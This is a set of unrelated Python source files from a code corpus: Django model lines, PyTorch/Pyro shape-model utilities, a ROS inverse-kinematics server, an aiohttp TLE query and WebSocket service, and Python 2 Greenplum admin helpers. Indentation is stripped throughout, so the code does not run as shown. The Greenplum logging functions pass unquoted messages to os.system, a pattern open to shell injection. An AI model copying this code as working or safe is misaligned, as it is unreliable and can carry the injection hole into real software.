# ratings = models.
def __str__(self):
return self.title
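# Illustrative ORM usage for the many-to-many fields above (not part of the
# original app; assumes migrations have been applied and runs in a Django shell):
#
#     plumbers = Listing.objects.filter(category__category='plumber')
#     listings_by_alice = Listing.objects.filter(user__username='alice')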
|
StarcoderdataPython
|
9767045
|
import collections
import itertools
import logging
from pathlib import Path
import cmws
import numpy as np
import pyro
import scipy.linalg  # scipy.linalg.eig is used in plot_normal2d below
import torch
from cmws.examples.csg.models import (
heartangles,
hearts,
hearts_pyro,
ldif_representation,
ldif_representation_pyro,
neural_boundary,
neural_boundary_pyro,
no_rectangle,
rectangles,
shape_program,
shape_program_pyro,
shape_program_pytorch,
)
# Init, saving, etc
def init(run_args, device):
memory = None
if run_args.model_type == "rectangles":
# Generative model
generative_model = rectangles.GenerativeModel().to(device)
# Guide
guide = rectangles.Guide().to(device)
elif run_args.model_type == "heartangles":
# Generative model
generative_model = heartangles.GenerativeModel().to(device)
# Guide
guide = heartangles.Guide().to(device)
elif run_args.model_type == "hearts":
# Generative model
generative_model = hearts.GenerativeModel().to(device)
# Guide
guide = hearts.Guide().to(device)
elif run_args.model_type == "shape_program":
# Generative model
generative_model = shape_program.GenerativeModel().to(device)
# Guide
guide = shape_program.Guide().to(device)
elif run_args.model_type == "no_rectangle":
# Generative model
generative_model = no_rectangle.GenerativeModel().to(device)
# Guide
guide = no_rectangle.Guide().to(device)
elif run_args.model_type == "ldif_representation":
# Generative model
generative_model = ldif_representation.GenerativeModel().to(device)
# Guide
guide = ldif_representation.Guide().to(device)
elif run_args.model_type == "hearts_pyro":
# Generative model
generative_model = hearts_pyro.GenerativeModel().to(device)
# Guide
guide = hearts_pyro.Guide().to(device)
elif run_args.model_type == "ldif_representation_pyro":
# Generative model
generative_model = ldif_representation_pyro.GenerativeModel().to(device)
# Guide
guide = ldif_representation_pyro.Guide().to(device)
elif run_args.model_type == "neural_boundary":
# Generative model
generative_model = neural_boundary.GenerativeModel().to(device)
# Guide
guide = neural_boundary.Guide().to(device)
elif run_args.model_type == "neural_boundary_pyro":
# Generative model
generative_model = neural_boundary_pyro.GenerativeModel(
num_primitives=run_args.num_primitives, has_shape_scale=run_args.model_has_shape_scale
).to(device)
# Guide
guide = neural_boundary_pyro.Guide(
num_primitives=run_args.num_primitives, has_shape_scale=run_args.model_has_shape_scale
).to(device)
elif run_args.model_type == "shape_program_pyro":
# Generative model
generative_model = shape_program_pyro.GenerativeModel(
num_primitives=run_args.num_primitives
).to(device)
# Guide
guide = shape_program_pyro.Guide(num_primitives=run_args.num_primitives).to(device)
elif run_args.model_type == "shape_program_pytorch":
# Generative model
generative_model = shape_program_pytorch.GenerativeModel(
num_primitives=run_args.num_primitives
).to(device)
# Guide
guide = shape_program_pytorch.Guide(num_primitives=run_args.num_primitives).to(device)
# Memory
if "mws" in run_args.algorithm:
memory = cmws.memory.Memory(10000, run_args.memory_size, generative_model).to(device)
# Model tuple
model = {"generative_model": generative_model, "guide": guide, "memory": memory}
# Optimizer
if run_args.model_type == "rectangles":
parameters = guide.parameters()
else:
parameters = itertools.chain(generative_model.parameters(), guide.parameters())
if "_pyro" in run_args.model_type:
optimizer = pyro.optim.pytorch_optimizers.Adam({"lr": run_args.lr})
else:
optimizer = torch.optim.Adam(parameters, lr=run_args.lr)
# Stats
stats = Stats([], [], [], [])
return model, optimizer, stats
def save_checkpoint(path, model, optimizer, stats, run_args=None):
Path(path).parent.mkdir(parents=True, exist_ok=True)
generative_model, guide, memory = model["generative_model"], model["guide"], model["memory"]
torch.save(
{
"generative_model_state_dict": None
if run_args.model_type == "rectangles"
else generative_model.state_dict(),
"guide_state_dict": guide.state_dict(),
"memory_state_dict": None if memory is None else memory.state_dict(),
"optimizer_state_dict": optimizer.get_state()
if "_pyro" in run_args.model_type
else optimizer.state_dict(),
"stats": stats,
"run_args": run_args,
},
path,
)
logging.info(f"Saved checkpoint to {path}")
def load_checkpoint(path, device):
checkpoint = torch.load(path, map_location=device)
run_args = checkpoint["run_args"]
model, optimizer, stats = init(run_args, device)
generative_model, guide, memory = model["generative_model"], model["guide"], model["memory"]
guide.load_state_dict(checkpoint["guide_state_dict"])
if run_args.model_type != "rectangles":
generative_model.load_state_dict(checkpoint["generative_model_state_dict"])
if memory is not None:
memory.load_state_dict(checkpoint["memory_state_dict"])
model = {"generative_model": generative_model, "guide": guide, "memory": memory}
if "_pyro" in run_args.model_type:
optimizer.set_state(checkpoint["optimizer_state_dict"])
else:
optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
stats = checkpoint["stats"]
return model, optimizer, stats, run_args
Stats = collections.namedtuple("Stats", ["losses", "sleep_pretraining_losses", "log_ps", "kls"])
def plot_normal2d(ax, mean, cov, num_points=100, confidence=0.95, **kwargs):
# https://stats.stackexchange.com/questions/64680/how-to-determine-quantiles-isolines-of-a-multivariate-normal-distribution
# plots a `confidence' probability ellipse
const = -2 * np.log(1 - confidence)
eigvals, eigvecs = scipy.linalg.eig(np.linalg.inv(cov))
eigvals = np.real(eigvals)
a = np.sqrt(const / eigvals[0])
b = np.sqrt(const / eigvals[1])
theta = np.linspace(-np.pi, np.pi, num=num_points)
xy = eigvecs @ np.array([np.cos(theta) * a, np.sin(theta) * b]) + np.expand_dims(mean, -1)
ax.plot(xy[0, :], xy[1, :], **kwargs)
return ax
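# Example use of plot_normal2d (illustrative only; matplotlib is not imported by
# this module, so the snippet is left as a comment):
#
#     import matplotlib.pyplot as plt
#     fig, ax = plt.subplots()
#     plot_normal2d(ax, mean=np.array([0.0, 0.0]),
#                   cov=np.array([[1.0, 0.5], [0.5, 2.0]]), color="k")
#     plt.show()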
class RectanglePoseDistribution:
def __init__(self, device):
self.device = device
self.lim = torch.tensor(0.8, device=self.device)
def sample(self, sample_shape):
"""
Args
sample_shape
Returns [*sample_shape, 4]
"""
minus_lim = -self.lim
padding = 0.2
min_x = torch.distributions.Uniform(minus_lim, self.lim - padding).sample(sample_shape)
max_x = torch.distributions.Uniform(min_x + padding, self.lim).sample()
min_y = torch.distributions.Uniform(minus_lim, self.lim - padding).sample(sample_shape)
max_y = torch.distributions.Uniform(min_y + padding, self.lim).sample()
return torch.stack([min_x, min_y, max_x, max_y], dim=-1)
def log_prob(self, xy_lims):
"""
Args
xy_lims [*shape, 4]
Returns [*shape]
"""
# HACK
shape = xy_lims.shape[:-1]
return torch.zeros(shape, device=xy_lims.device)
# min_x, min_y, max_x, max_y = [xy_lims[..., i] for i in range(4)]
# minus_one = -self.one
# min_x_log_prob = torch.distributions.Uniform(minus_one, self.one).log_prob(min_x)
# max_x_log_prob = torch.distributions.Uniform(min_x, self.one).log_prob(max_x)
# min_y_log_prob = torch.distributions.Uniform(minus_one, self.one).log_prob(min_y)
# max_y_log_prob = torch.distributions.Uniform(min_y, self.one).log_prob(max_y)
# return min_x_log_prob + max_x_log_prob + min_y_log_prob + max_y_log_prob
class SquarePoseDistribution:
def __init__(self, random_side, device):
self.random_side = random_side
self.device = device
self.lim = torch.tensor(0.8, device=self.device)
def sample(self, sample_shape):
"""
Args
sample_shape
Returns [*sample_shape, 4]
"""
minus_lim = -self.lim
padding = 1.0
min_x = torch.distributions.Uniform(minus_lim, self.lim - padding).sample(sample_shape)
min_y = torch.distributions.Uniform(minus_lim, self.lim - padding).sample(sample_shape)
if self.random_side:
side = torch.distributions.Uniform(
torch.zeros_like(min_x), self.lim - torch.max(min_x, min_y)
).sample()
else:
side = 0.5
max_x = min_x + side
max_y = min_y + side
return torch.stack([min_x, min_y, max_x, max_y], dim=-1)
def log_prob(self, xy_lims):
"""
Args
xy_lims [*shape, 4]
Returns [*shape]
"""
shape = xy_lims.shape[:-1]
return torch.zeros(shape, device=xy_lims.device)
def heart_pose_to_str(heart_pose, fixed_scale=False):
"""
Args
heart_pose
raw_position [2]
raw_scale []
Returns (str)
"""
if fixed_scale:
raw_position = heart_pose
position = raw_position.sigmoid() - 0.5
        return f"H(x={position[0].item():.1f},y={position[1].item():.1f})"
else:
raw_position, raw_scale = heart_pose
position = raw_position.sigmoid() - 0.5
scale = raw_scale.sigmoid() * 0.8 + 0.1
        return f"H(x={position[0].item():.1f},y={position[1].item():.1f},s={scale.item():.1f})"
def rectangle_pose_to_str(rectangle_pose):
"""
Args
rectangle_pose [4]
Returns (str)
"""
return (
f"R(bl=({rectangle_lim_to_str(rectangle_pose[0].item())},"
f"{rectangle_lim_to_str(rectangle_pose[1].item())}),"
f"tr=({rectangle_lim_to_str(rectangle_pose[2].item())},"
f"{rectangle_lim_to_str(rectangle_pose[3].item())}))"
)
def rectangle_lim_to_str(rectangle_lim):
"""
Args
rectangle_lim (float)
Returns (str)
"""
if rectangle_lim > 1:
return ">1"
elif rectangle_lim < -1:
return "<-1"
else:
return f"{rectangle_lim:.1f}"
def get_gaussian_kernel(dx, dy, kernel_size, scale, device):
"""
Args
dx (float)
dy (float)
kernel_size (int)
scale (float)
device
Returns [kernel_size, kernel_size]
"""
# Inputs to the kernel function
kernel_x_lim = dx * kernel_size / 2
kernel_y_lim = dy * kernel_size / 2
x_range = torch.linspace(-kernel_x_lim, kernel_x_lim, steps=kernel_size, device=device)
y_range = torch.linspace(-kernel_y_lim, kernel_y_lim, steps=kernel_size, device=device)
# [kernel_size, kernel_size]
kernel_x, kernel_y = torch.meshgrid(x_range, y_range)
# [kernel_size, kernel_size, 2]
kernel_xy = torch.stack([kernel_x, kernel_y], dim=-1)
# Kernel function
kernel_dist = torch.distributions.Independent(
torch.distributions.Normal(
torch.zeros((2,), device=device), torch.ones((2,), device=device) * scale
),
reinterpreted_batch_ndims=1,
)
# Output from the kernel function
# [kernel_size, kernel_size]
log_kernel = kernel_dist.log_prob(kernel_xy)
# normalize
log_kernel = log_kernel - torch.logsumexp(log_kernel.view(-1), dim=0)
return log_kernel.exp()
def smooth_image(image, kernel_size, scale):
"""
Args
image [*shape, num_rows, num_cols] (limits -1, 1)
kernel_size (int; must be odd)
scale (float)
Returns [*shape, num_rows, num_cols]
"""
if kernel_size % 2 == 0:
raise ValueError(f"kernel_size must be odd. got {kernel_size}")
# Extract
device = image.device
num_rows, num_cols = image.shape[-2:]
shape = image.shape[:-2]
num_samples = int(torch.tensor(shape).prod().long().item())
    image_flattened = image.view(num_samples, num_rows, num_cols)
# Create gaussian kernel
dx, dy = 2 / num_cols, 2 / num_rows
kernel = get_gaussian_kernel(dx, dy, kernel_size, scale, device)
# Run convolution
return torch.nn.functional.conv2d(
image_flattened[:, None], kernel[None, None], padding=kernel_size // 2
).view(*[*shape, num_rows, num_cols])
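# Example use of smooth_image (illustrative only): blur a batch of 64x64 images
# with a 5x5 Gaussian kernel; the output has the same shape as the input.
#
#     images = torch.rand(8, 64, 64)
#     blurred = smooth_image(images, kernel_size=5, scale=0.1)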
|
StarcoderdataPython
|
3560522
|
<reponame>AbanobEffat/Pick-and-Place-Udacity
#!/usr/bin/env python
# Copyright (C) 2017 Udacity Inc.
#
# This file is part of Robotic Arm: Pick and Place project for Udacity
# Robotics nano-degree program
#
# All Rights Reserved.
# Author: <NAME>
# import modules
import rospy
import tf
from kuka_arm.srv import *
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
from geometry_msgs.msg import Pose
from mpmath import *
from sympy import *
import numpy as np
from numpy import array
from sympy import symbols, cos, sin, pi, sqrt, atan2
#Create symbol table
q1, q2, q3, q4, q5, q6, q7 = symbols('q1:8') # theta
d1, d2, d3, d4, d5, d6, d7 = symbols('d1:8') # Link Offset
a0, a1, a2, a3, a4, a5, a6 = symbols ('a0:7') # distance between z(i)_axis and z(i-1)_axis
alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6 = symbols('alpha0:7') #Angle between Z(i-) and Z(i)
DH_table = {alpha0: 0, a0: 0, d1: 0.75,
alpha1: -90.0, a1: 0.35, d2: 0, q2: q2-90.0,
alpha2: 0, a2: 1.25, d3: 0,
alpha3: -90.0, a3: -0.054, d4: 1.5,
alpha4: 90.0, a4: 0, d5: 0,
alpha5: -90.0, a5: 0, d6: 0,
alpha6: 0, a6: 0, d7: 0.303, q7: 0}
ROT_EE = Matrix([[0,0,0],[0,0,0],[0,0,0]])
#Modified DH Transformation matrix Function
def TM_Generator(alpha,a,d,q):
tm = Matrix([[ cos(q), -sin(q), 0, a],
[sin(q) * cos(alpha), cos(q) * cos(alpha), -sin(alpha), -sin(alpha) * d],
[sin(q) * sin(alpha), sin(alpha) * cos(q), cos(alpha), cos(alpha) * d],
[ 0, 0, 0, 1]])
return tm
# Create individual transformation matrices
T0_1 = TM_Generator(alpha0, a0, d1, q1).subs(DH_table)
T1_2 = TM_Generator(alpha1, a1, d2, q2).subs(DH_table)
T2_3 = TM_Generator(alpha2, a2, d3, q3).subs(DH_table)
T3_4 = TM_Generator(alpha3, a3, d4, q4).subs(DH_table)
T4_5 = TM_Generator(alpha4, a4, d5, q5).subs(DH_table)
T5_6 = TM_Generator(alpha5, a5, d6, q6).subs(DH_table)
T6_G = TM_Generator(alpha6, a6, d7, q7).subs(DH_table)
T0_G = T0_1 * T1_2 * T2_3 * T3_4 * T4_5 * T5_6 * T6_G
#Fixing gripper rotation in Y axis by 180 and Z axis by 90
r, p , y = symbols('r p y')
x_rot = Matrix([
[ 1, 0, 0],
[ 0, cos(r), -sin(r)],
[ 0, sin(r), cos(r)]]) # ROLL
y_rot = Matrix([
[ cos(p), 0, sin(p)],
[ 0, 1, 0],
[-sin(p), 0, cos(p)]]) # PITCH
z_rot = Matrix([
[cos(y), -sin(y), 0],
[sin(y), cos(y), 0],
[ 0, 0, 1]]) # YAW
Rot_Fixed = z_rot.subs(y, radians(180)) * y_rot.subs(p,radians(-90))
ROT_Error = z_rot * y_rot * x_rot
ROT_EE = ROT_Error * Rot_Fixed
def handle_calculate_IK(req):
rospy.loginfo("Received %s eef-poses from the plan" % len(req.poses))
if len(req.poses) < 1:
print ("No valid poses received")
return -1
else:
global q1, q2, q3, q4, q5, q6, q7
global d1, d2, d3, d4, d5, d6, d7
global a0, a1, a2, a3, a4, a5, a6
global alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6
global DH_table
global ROT_EE
global T0_1, T1_2, T2_3, T3_4, T4_5, T5_6, T6_G, T0_G
# Initialize service response
joint_trajectory_list = []
for x in xrange(0, len(req.poses)):
# IK code starts here
joint_trajectory_point = JointTrajectoryPoint()
# Extract end-effector position and orientation from request
# px,py,pz = end-effector position
# roll, pitch, yaw = end-effector orientation
px = req.poses[x].position.x
py = req.poses[x].position.y
pz = req.poses[x].position.z
(roll, pitch, yaw) = tf.transformations.euler_from_quaternion(
[req.poses[x].orientation.x, req.poses[x].orientation.y,
req.poses[x].orientation.z, req.poses[x].orientation.w])
ROT_EE = ROT_EE.subs({'r': roll, 'p': pitch, 'y': yaw}) # Extract nx, ny, and nz values
EE_Point = Matrix([[px], [py], [pz]])
WC = EE_Point - (0.303) * ROT_EE[:,2] # Getting Wrist center coordinates
side_a = 1.501 #constant
side_bz = WC[2] - 0.75
side_bxy = sqrt(pow(WC[0], 2) + pow(WC[1], 2) ) - 0.35
side_b = sqrt(pow(side_bz, 2) + pow(side_bxy, 2))
side_c = 1.25 #constant
angle_a = acos( ( pow(side_b, 2) + pow(side_c, 2) - pow(side_a, 2)) / (2 * side_b * side_c) )
angle_b = acos( ( pow(side_a, 2) + pow(side_c, 2) - pow(side_b, 2)) / (2 * side_a * side_c) )
angle_c = acos( ( pow(side_a, 2) + pow(side_b, 2) - pow(side_c, 2)) / (2 * side_a * side_b) )
theta1 = atan2(WC[1], WC[0])
theta2 = pi/2 - angle_a - atan2(side_bz, side_bxy)
theta3 = pi/2 - (angle_b + 0.036) # 0.036 sag in link4
R0_3 = T0_1[0:3,0:3] * T1_2[0:3,0:3] * T2_3[0:3,0:3]
R0_3 = R0_3.evalf(subs={q1: theta1, q2:theta2, q3: theta3})
R3_6 = R0_3.transpose() * ROT_EE
theta4 = atan2(R3_6[2,2], -R3_6[0,2])
theta5 = atan2(sqrt(pow(R3_6[0,2], 2) + pow(R3_6[2,2], 2)), R3_6[1,2])
theta6 = atan2(-R3_6[1,1], R3_6[1,0])
joint_trajectory_point.positions = [theta1, theta2, theta3, theta4, theta5, theta6]
joint_trajectory_list.append(joint_trajectory_point)
rospy.loginfo("length of Joint Trajectory List: %s" % len(joint_trajectory_list))
return CalculateIKResponse(joint_trajectory_list)
def IK_server():
# initialize node and declare calculate_ik service
rospy.init_node('IK_server')
s = rospy.Service('calculate_ik', CalculateIK, handle_calculate_IK)
print "Ready to receive an IK request"
rospy.spin()
if __name__ == "__main__":
IK_server()
|
StarcoderdataPython
|
11308242
|
<gh_stars>0
# -*- coding: utf-8 -*-
import sqlalchemy as sa
import ujson
from aiohttp import web, WSMsgType
from .db import TLE
from .log import logger
from .utils import parse_sa_filter, parse_sa_order, check_sa_column, get_sa_column
async def query(request):
filters = []
if 'filters' not in request.query:
raise web.HTTPBadRequest(reason='Query parameter `filters` is required')
try:
_filters = ujson.loads(request.query.get('filters', '{}'))
for k, v in _filters.items():
filters.extend(parse_sa_filter(TLE, k, v))
except ValueError:
raise web.HTTPBadRequest(reason='Query parameter `filters` must contains valid JSON')
_order = request.query.get('order', '{}')
if _order.startswith('{'):
try:
order = ujson.loads(_order)
except ValueError:
raise web.HTTPBadRequest(reason='Query parameter `order` must contains valid JSON')
else:
order = _order
order = parse_sa_order(TLE, order)
only = [get_sa_column(TLE, key) for key in request.query.get('only', '').split(',') if check_sa_column(TLE, key)]
async with request.app['pg'].acquire() as conn:
rp = await conn.execute(sa.select(only or [TLE]).where(sa.and_(*filters)).order_by(*order))
return [dict(r) async for r in rp]
async def index(request):
html = '''
<html>
<head>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script>
var source = new WebSocket('ws://' + window.location.host + '/subscribe');
function eventListener(event) {
var message = JSON.parse(event.data);
$('.messages').append([
$('<dt>').text(message.channel),
$('<dd>').text(event.data),
]);
}
source.onmessage = eventListener;
</script>
</head>
<body>
<dl class="messages"></dl>
</body>
</html>
'''
return web.Response(text=html, content_type='text/html')
async def subscribe(request):
ws = web.WebSocketResponse()
await ws.prepare(request)
request.app['channels'].add(ws)
logger.debug('Someone joined.')
try:
while True:
msg = await ws.receive_json()
if msg.get('command') == 'close':
await ws.close()
except Exception as exc:
logger.exception(exc)
finally:
request.app['channels'].remove(ws)
if ws.closed:
request.app['channels'].remove(ws)
logger.debug('websocket connection closed')
return ws
|
StarcoderdataPython
|
6637132
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import with_statement
import os, sys
progname = os.path.split(sys.argv[0])[-1]
if sys.version_info < (2, 5, 0):
sys.exit(
'''Error: %s is supported on Python versions 2.5.0 or greater
Please upgrade python installed on this machine.''' % progname)
#turning off Deprecation warnings (for now)
import warnings
warnings.simplefilter('ignore', DeprecationWarning)
import platform, gplib, socket, random, popen2
import threading
from time import localtime, strftime
import pg8000
import pysync
##################
log = {}
log['verbose'] = True
log['module'] = ''
log['host'] = socket.gethostname().split('.')[0]
log['user'] = os.environ.get('USER') or os.environ.get('LOGNAME')
log['file'] = None
##################
def log_set_module(module):
global log
log['module'] = module
##################
def log_set_verbose(verbose):
global log
log['verbose'] = verbose
##################
def log_set_file(file):
global log
log['file'] = file
##################
def log_info(msg, tofile=False):
global log
logs = '%s:%s:%s:%s-[INFO]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['verbose'] and not tofile:
print logs
else:
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
##################
def log_error(msg, tofile=False):
global log
logs = '%s:%s:%s:%s-[ERROR]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['verbose'] and not tofile:
print logs
else:
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
##################
def log_warn(msg, tofile=False):
global log
logs = '%s:%s:%s:%s-[WARN]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['verbose'] and not tofile:
print logs
else:
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
##################
def log_fatal(msg, tofile=False):
global log
logs = '%s:%s:%s:%s-[FATAL]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['verbose'] and not tofile:
print logs
else:
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
##################
def error(msg):
global log
logs = '%s:%s:%s:%s-[ERROR]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
print logs
print '%s:%s:%s:%s-[ERROR]:- Program aborted.' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'])
sys.exit(1)
##################
def fatal(msg):
global log
logs = '%s:%s:%s:%s-[FATAL]:- %s' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'], msg)
if log['file']:
os.system('%s "%s" >> %s' % (ENV.ECHO, logs, log['file']))
print logs
print '%s:%s:%s:%s-[FATAL]:- Program aborted.' % (strftime('%Y%m%d:%H:%M:%S', localtime()), log['module'], log['host'], log['user'])
sys.exit(2)
#############
def findCmdInPath_noerror(cmd):
CMDPATH = ('/usr/kerberos/bin', '/usr/sfw/bin', '/opt/sfw/bin', '/usr/local/bin', '/bin',
'/usr/bin', '/sbin', '/usr/sbin', '/usr/ucb', '/sw/bin', '/opt/Navisphere/bin')
for p in CMDPATH:
f = os.path.join(p, cmd)
if os.path.exists(f):
return f
return ''
def findCmdInPath(cmd):
cmd = findCmdInPath_noerror(cmd)
if cmd == '':
fatal('Command %s not found' % cmd)
return cmd
#############
def makeCommand(cmd):
GPHOME=os.environ.get('GPHOME')
LIB_PATH=os.environ.get(ENV.LIB_TYPE)
if not LIB_PATH:
LIB_PATH='%s/lib:%s/ext/python/lib:.' % (GPHOME, GPHOME)
PATH=os.environ.get('PATH')
if not PATH:
PATH='%s/bin:%s/ext/python/bin:.' % (GPHOME, GPHOME)
PYTHONPATH=os.environ.get('PYTHONPATH')
if not PYTHONPATH:
PYTHONPATH="%(gphome)s/lib/python" % {'gphome':GPHOME}
return ('GPHOME=%s && export GPHOME '
'&& PATH=%s && export PATH '
'&& %s=%s && export %s '
'&& PYTHONPATH=%s && export PYTHONPATH '
'&& %s'
% (GPHOME,
PATH,
ENV.LIB_TYPE,
LIB_PATH,
ENV.LIB_TYPE,
PYTHONPATH,
cmd))
#############
def run2(cmd, on_error_warn=False, setpid_callback=None):
p = None
ok = False
out = []
try:
p = popen2.Popen3(cmd, capturestderr=True)
if setpid_callback:
setpid_callback(p.pid)
e = p.wait()
for line in p.fromchild:
out.append(line)
ok = not e
if not ok and on_error_warn:
log_warn('-----------------------------------------------------')
log_warn('Command Failed: %s' % cmd)
log_warn('Exit status: %d' % os.WEXITSTATUS(e))
if len(out) > 0:
log_warn('Standard output:')
for l in out:
log_warn('\t %s' % l.strip())
else:
log_warn('Standard output: None')
err = []
for line in p.childerr:
err.append(line)
if len(err) > 0:
log_warn('Standard error:')
for l in err:
log_warn('\t %s' % l.strip())
else:
log_warn('Standard error: None')
log_warn('-----------------------------------------------------')
finally:
if p:
if p.fromchild:
p.fromchild.close()
if p.childerr:
p.childerr.close()
return (ok, out)
def run(cmd):
return run2(cmd, False)
def run_warn(cmd, setpid_callback=None):
return run2(cmd, on_error_warn=True,setpid_callback=setpid_callback)
#############
def file_exists(file, host=None):
if not host or host == 'localhost':
return os.path.isfile(file)
else:
(ok, out) = run('%s test -f %s && test -r %s' % (gplib.ssh_prefix(host=host), file, file))
return ok
#############
def directory_exists(dir, host=None):
if not host or host == 'localhost':
return os.path.isdir(dir)
else:
(ok, out) = run('%s test -d %s' % (gplib.ssh_prefix(host=host), dir))
return ok
#############
def directory_writable(dir, host=None):
f = None
file = os.path.join(dir, 'tmp_file_test')
if not host or host == 'localhost':
try:
try:
f = open(file, 'w')
f.close()
except IOError, e:
fatal('write file %s error' % file)
finally:
f.close()
os.remove(file)
else:
gphome = os.environ.get('GPHOME')
cmd = makeCommand('''python -c \\"import sys, os; sys.path.extend(['%s', '%s']); import gpmlib; gpmlib.directory_writable('%s')\\"''' %
(os.path.join(gphome, 'bin', 'lib'), os.path.join(gphome, 'lib', 'python'), dir))
(ok, out) = run('''%s "%s"''' % (gplib.ssh_prefix(host=host), cmd))
if not ok:
fatal('write file %s error' % file)
return True
#############
class Env:
def __init__(self):
self.GPHOME = None
self.USER = None
# mirror type
self.MIRROR_NULL_TYPE = 0
self.MIRROR_SINGLE_HOME_GROUP_TYPE = 1
self.MIRROR_SINGLE_HOME_SPREAD_TYPE = 2
self.MIRROR_MULTI_HOME_GROUP_TYPE = 3
self.MIRROR_MULTI_HOME_SPREAD_TYPE = 4
self.DBNAME = 'template1'
self.GP_PG_VIEW = '''(SELECT l.dbid, l.isprimary, l.content, l."valid",
l.definedprimary FROM gp_pgdatabase() l(dbid smallint,
isprimary boolean, content smallint, "valid" boolean,
definedprimary boolean))'''
self.AWK = findCmdInPath('awk')
self.BASENAME = findCmdInPath('basename')
self.CAT = findCmdInPath('cat')
self.CLEAR = findCmdInPath('clear')
self.CKSUM = findCmdInPath('cksum')
self.CUT = findCmdInPath('cut')
self.DATE = findCmdInPath('date')
self.DD = findCmdInPath('dd')
self.DIRNAME = findCmdInPath('dirname')
self.DF = findCmdInPath('df')
self.DU = findCmdInPath('du')
self.ECHO = findCmdInPath('echo')
self.EXPR = findCmdInPath('expr')
self.FIND = findCmdInPath('find')
self.GP_MOUNT_AGENT = findCmdInPath_noerror('gp_mount_agent') # GPDB supplied, but only required for SAN.
self.GREP = findCmdInPath('grep')
self.GZIP = findCmdInPath('gzip')
self.EGREP = findCmdInPath('egrep')
self.HEAD = findCmdInPath('head')
self.HOSTNAME = findCmdInPath('hostname')
self.INQ = findCmdInPath_noerror('inq') # SAN-specific not available on every system.
self.IPCS = findCmdInPath('ipcs')
self.IFCONFIG = findCmdInPath('ifconfig')
self.KILL = findCmdInPath('kill')
self.LS = findCmdInPath('ls')
self.LOCALE = findCmdInPath('locale')
self.MV = findCmdInPath('mv')
self.MORE = findCmdInPath('more')
self.MOUNT = findCmdInPath('mount')
self.MKDIR = findCmdInPath('mkdir')
self.MKFIFO = findCmdInPath('mkfifo')
self.NAVISECCLI = findCmdInPath_noerror('naviseccli') # SAN-specific not available on every system.
self.NETSTAT = findCmdInPath('netstat')
self.PING = findCmdInPath('ping')
self.POWERMT = findCmdInPath_noerror('powermt') # SAN-specific not available on every system.
self.PS = findCmdInPath('ps')
self.RM = findCmdInPath('rm')
self.SCP = findCmdInPath('scp')
self.SED = findCmdInPath('sed')
self.SLEEP = findCmdInPath('sleep')
self.SORT = findCmdInPath('sort')
self.SPLIT = findCmdInPath('split')
self.SSH = findCmdInPath('ssh')
self.STAT = findCmdInPath_noerror('stat') # Only required for SAN.
self.TAIL = findCmdInPath('tail')
self.TAR = findCmdInPath('tar')
self.TEE = findCmdInPath('tee')
self.TOUCH = findCmdInPath('touch')
self.TR = findCmdInPath('tr')
self.WC = findCmdInPath('wc')
self.WHICH = findCmdInPath('which')
self.WHOAMI = findCmdInPath('whoami')
self.ZCAT = findCmdInPath('zcat')
plat = platform.uname()
self.SYSTEM = plat[0].lower()
if self.SYSTEM == 'sunos':
self.IFCONFIG_TXT='-a inet'
self.PS_TXT='ef'
self.LIB_TYPE='LD_LIBRARY_PATH'
self.ZCAT='gzcat'
self.PG_METHOD='trust'
self.HOST_ARCH_TYPE='uname -i'
self.NOLINE_ECHO='/usr/bin/echo'
self.DEFAULT_LOCALE_SETTING='en_US.UTF-8'
self.MAIL='/bin/mailx'
self.PING_TIME='1'
self.DF=findCmdInPath('df')
self.DU_TXT='-s'
self.GTAR = findCmdInPath('gtar')
elif self.SYSTEM == 'linux':
self.IFCONFIG_TXT=''
self.PS_TXT='ax'
self.LIB_TYPE='LD_LIBRARY_PATH'
self.PG_METHOD='ident'
self.HOST_ARCH_TYPE='uname -i'
self.NOLINE_ECHO='%s -e' % self.ECHO
self.DEFAULT_LOCALE_SETTING='en_US.utf8'
self.PING_TIME='-c 1'
self.DF='%s -P' % findCmdInPath('df')
self.DU_TXT='c'
self.GTAR = findCmdInPath('tar')
elif self.SYSTEM == 'darwin':
self.IFCONFIG_TXT=''
self.PS_TXT='ax'
self.LIB_TYPE='DYLD_LIBRARY_PATH'
self.PG_METHOD='ident'
self.HOST_ARCH_TYPE='uname -m'
self.NOLINE_ECHO= self.ECHO
self.DEFAULT_LOCALE_SETTING='en_US.utf-8'
self.PING_TIME='-c 1'
self.DF='%s -P' % findCmdInPath('df')
self.DU_TXT='-c'
self.GTAR = findCmdInPath('tar')
elif self.SYSTEM == 'freebsd':
self.IFCONFIG_TXT=''
self.PS_TXT='ax'
self.LIB_TYPE='LD_LIBRARY_PATH'
self.PG_METHOD='ident'
self.HOST_ARCH_TYPE='uname -m'
self.NOLINE_ECHO='%s -e' % self.ECHO
